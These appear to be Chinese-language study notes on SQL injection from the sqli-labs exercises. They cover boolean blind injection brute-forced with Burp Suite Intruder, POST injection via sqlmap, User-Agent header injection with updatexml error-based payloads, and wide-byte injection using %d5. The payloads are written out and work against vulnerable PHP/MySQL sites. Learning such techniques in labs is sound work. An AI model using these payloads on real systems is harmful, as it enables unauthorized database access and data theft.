1.布爾盲注burpsuit的使用
先自己構造好注入語句,利用burpsuit抓包,設置變量,查出想要的信息。
比如----查數據庫名的ascii碼得到數據庫構造好語句
http://123.206.227.79/Less-8/?id=1' and ascii(sbustr(database(),1,1))=1 --+
抓包,發送到intruder,設置變量
第一個變量設置為numbers 1到8,第二個變量也設置為numbers 0到127 開始爆破,
2.post注入
其實並沒有什么變化,還是之前的注入方式,無非之前在URL上插payload,現在得抓包,在post參數里插payload,還是顯注,布爾,時間盲注,爆錯注入,套用之前的payload就可以。
抓到post包 參數后加* 保存為txt有sqlmap檢測
3.http頭注入
1、Accept:告訴 WEB 服務器自己接受什么介質類型,*/* 表示任何類型,type/* 表示該類型下的所有子類型,type/sub-type
2、Referer:瀏覽器向 WEB 服務器表明自己是從哪個 網頁/URL 獲得/點擊 當前請求中的網址/URL。例如:Referer:http://www.sina.com/
3、User-Agent: 瀏覽器表明自己的身份(是哪種瀏覽器)。例如:User-Agent:Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent','$IP', $uname)"; 將 useragent 和 ip 插入到數據庫中 構造閉合 'or updatexml(1,user(),1)+' $insert="INSERT INTO `security`.`uagents`+(`uagent'or updatexml(1,user(),1)+'`, `ip_address`, `username`) VALUES ('$uagent','$IP', $uname)"; c'+updatexml(1,concat(0x7e,database(),0x7e),1)+' c'+updatexml(1,concat(0x7e,database(),0x7e),1)and'
4利用burpsuit查找注入點
先抓包設置好變量
設置payload
開始攻擊
5.寬字節注入
構造id參數的查詢語句,各種試id的值,發現結果只有一句話和空白頁兩種情況。然后添加單引號發現返回空白頁。
由於加單引號會出現空白頁,沒有報錯,嘗試寬字節注入
加 %d5 讓單引號逃逸出來
很好的書burpsuit實戰指南